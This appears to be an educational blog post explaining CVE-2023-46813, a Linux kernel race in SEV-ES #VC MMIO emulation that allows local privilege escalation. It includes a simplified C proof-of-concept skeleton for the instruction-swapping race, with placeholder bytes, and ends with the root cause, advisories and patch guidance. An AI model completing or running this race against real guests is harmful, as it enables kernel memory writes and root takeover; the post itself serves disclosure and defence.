CVE-2023-46813 - Exploiting Linux Kernel SEV-ES MMIO Race to Gain Root

In late 2023, CVE-2023-46813 was disclosed: a serious local privilege escalation in Linux kernels before version 6.5.9. It sits at a nuanced intersection of AMD SEV-ES virtualization and MMIO (Memory-Mapped I/O) handling. The flaw lies in how the kernel emulates certain MMIO instructions issued from userspace. A userspace attacker with access to MMIO registers can win a race condition that grants write access to kernel memory and, effectively, root privileges.

This post offers a deep, hands-on look at the CVE, how it occurs, and how it might be exploited. We also supply links to original advisories and recommended patches. Above all, this post aims to make the issue understandable for everyone, regardless of how familiar you are with kernel hacking.

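- Affected: Linux kernels before 6.5.9 running as AMD SEV-ES guests
- Precondition: a local process with userspace access to MMIO registers
- Impact: arbitrary kernel memory writes from userspace, enabling privilege escalation
- Mechanism: a race condition lets userspace swap the faulting instruction after the #VC is raised but before the kernel's #VC handler fetches and emulates it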

In Practice

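When a process inside an AMD SEV-ES guest accesses an MMIO register (e.g., writes to a PCI device region mapped into its address space), the hypervisor cannot emulate the access directly, because SEV-ES keeps the guest's register state encrypted. Instead, the CPU raises a #VC (VMM Communication Exception) inside the guest, and the guest kernel's #VC handler "emulates" the instruction in software, sharing only the necessary values with the hypervisor. To do that, the handler has to read the instruction bytes back from the userspace memory the instruction came from.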

In affected kernels, nothing guarantees that the bytes the handler reads are the instruction that actually faulted. A clever attacker can therefore race the handler: overwrite the instruction in their own memory immediately after triggering the #VC, but before the kernel reads it. The kernel then emulates an entirely different, attacker-chosen instruction, and because it performs the emulation with kernel privileges, that instruction's memory operand can point into kernel memory.

1. Map an MMIO region into userspace.

Typically this means mapping a hardware device's MMIO area via /dev/mem or a similar interface. Such interfaces are normally restricted to privileged users, so the attacker needs a process that has been granted this access.

2. In parallel, race to swap out the instruction in your code page.

As soon as the CPU delivers the #VC and the kernel starts handling it, overwrite the userspace instruction bytes from a second thread, before the handler fetches them.

3. The kernel decodes the swapped instruction.

The handler now emulates the attacker-controlled instruction instead of the original one. Its memory operand can target kernel addresses, potentially giving the attacker an arbitrary write to kernel memory.

The following C code outlines the critical race:

#include <stdio.h>
#include <pthread.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdint.h>
#include <string.h>

volatile uint8_t *mmio;
volatile uint8_t *code_region;

void* racer(void *arg) {
    // Repeatedly overwrite the instruction bytes right after the main thread triggers the #VC
    uint8_t malicious_bytes[] = { /* attacker-chosen instruction, e.g. MOV [addr], val */ };
    while (1) {
        memcpy((void*)code_region, malicious_bytes, sizeof(malicious_bytes));
    }
}

int main(void) {
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0) {
        perror("open /dev/mem");
        return 1;
    }
    // 0x12340000 is a placeholder physical address for the device's MMIO region
    mmio = mmap(NULL, 0x100, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x12340000);
    close(fd);
    if (mmio == MAP_FAILED) {
        perror("mmap MMIO");
        return 1;
    }

    // Place instruction in writable, executable memory
    code_region = mmap(NULL, 0x100, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (code_region == MAP_FAILED) {
        perror("mmap code");
        return 1;
    }

    // Write vanilla instruction initially (e.g. simple mov to MMIO region)
    uint8_t vanilla_bytes[] = { /* e.g., MOV mmio, al */ };
    memcpy((void*)code_region, vanilla_bytes, sizeof(vanilla_bytes));

    pthread_t t;
    pthread_create(&t, NULL, racer, NULL);

    // Wait a little to synchronize the start of racer
    usleep(100);

    // Trigger #VC
    ((void(*)(void))code_region)();

    // Cleanup
    munmap((void*)mmio, 0x100);
    munmap((void*)code_region, 0x100);

    return 0;
}

*Note: The above is a simplified illustration; the instruction bytes and the MMIO address are placeholders. Real-world exploit code would need precise instruction bytes, considerable fine-tuning, and careful timing to win the race.*

Exploit Impact

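Successful exploitation gives an attacker an arbitrary kernel memory write from an unprivileged userspace process that has MMIO access. In practice, such a primitive is generally enough to gain full root privileges inside the guest.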

How Did This Happen?

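The fault lies in the way the kernel emulates instructions after a #VC. The #VC handling code in arch/x86/kernel/sev.c and sev-shared.c fetched and decoded the faulting instruction from userspace without re-validating it, and did not check that a user-mode instruction's memory operands pointed into user memory. Because the CPU's permission checks had been applied to the original instruction, not to the one the kernel later decoded, this time-of-check-to-time-of-use (TOCTOU) gap became a kernel write primitive. A proper mitigation has to ensure that whatever the kernel decodes is validated before it is emulated; the upstream fix goes further and stops emulating MMIO accesses that originate from user mode, alongside related checks for user-mode port I/O.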

References and Original Advisories

- Linux kernel commit fixing CVE-2023-46813
- Red Hat Security Advisory
- CVE Details
- QEMU and SEV-ES background
- Canonical Ubuntu Tracker

Mitigation

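Upgrade your kernel to 6.5.9 or later, or to a distribution kernel that carries the backported fix; check your vendor's advisory, since distribution version numbers often do not reflect backports.
If you run AMD SEV-ES guests on a cloud or VM farm, restrict MMIO mappings (for example via /dev/mem) to trusted code only, and keep the entire system patched.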

Conclusion

CVE-2023-46813 is a clear, modern example of how virtualization and instruction emulation can go wrong in subtle ways, opening the door to serious local exploits. It underscores why the user/kernel boundary, particularly where it meets newer CPU features, needs rigorous defense.

Until patched, exposing direct MMIO access to untrusted processes in SEV-ES guests is dangerous. Upgrade now.

*If you found this guide useful, you can learn more about similar Linux kernel exploits at Kernel Newbies or follow ongoing security advisories on oss-security.*

Timeline

Published on: 10/27/2023 03:15:08 UTC
Last modified on: 11/07/2023 20:42:02 UTC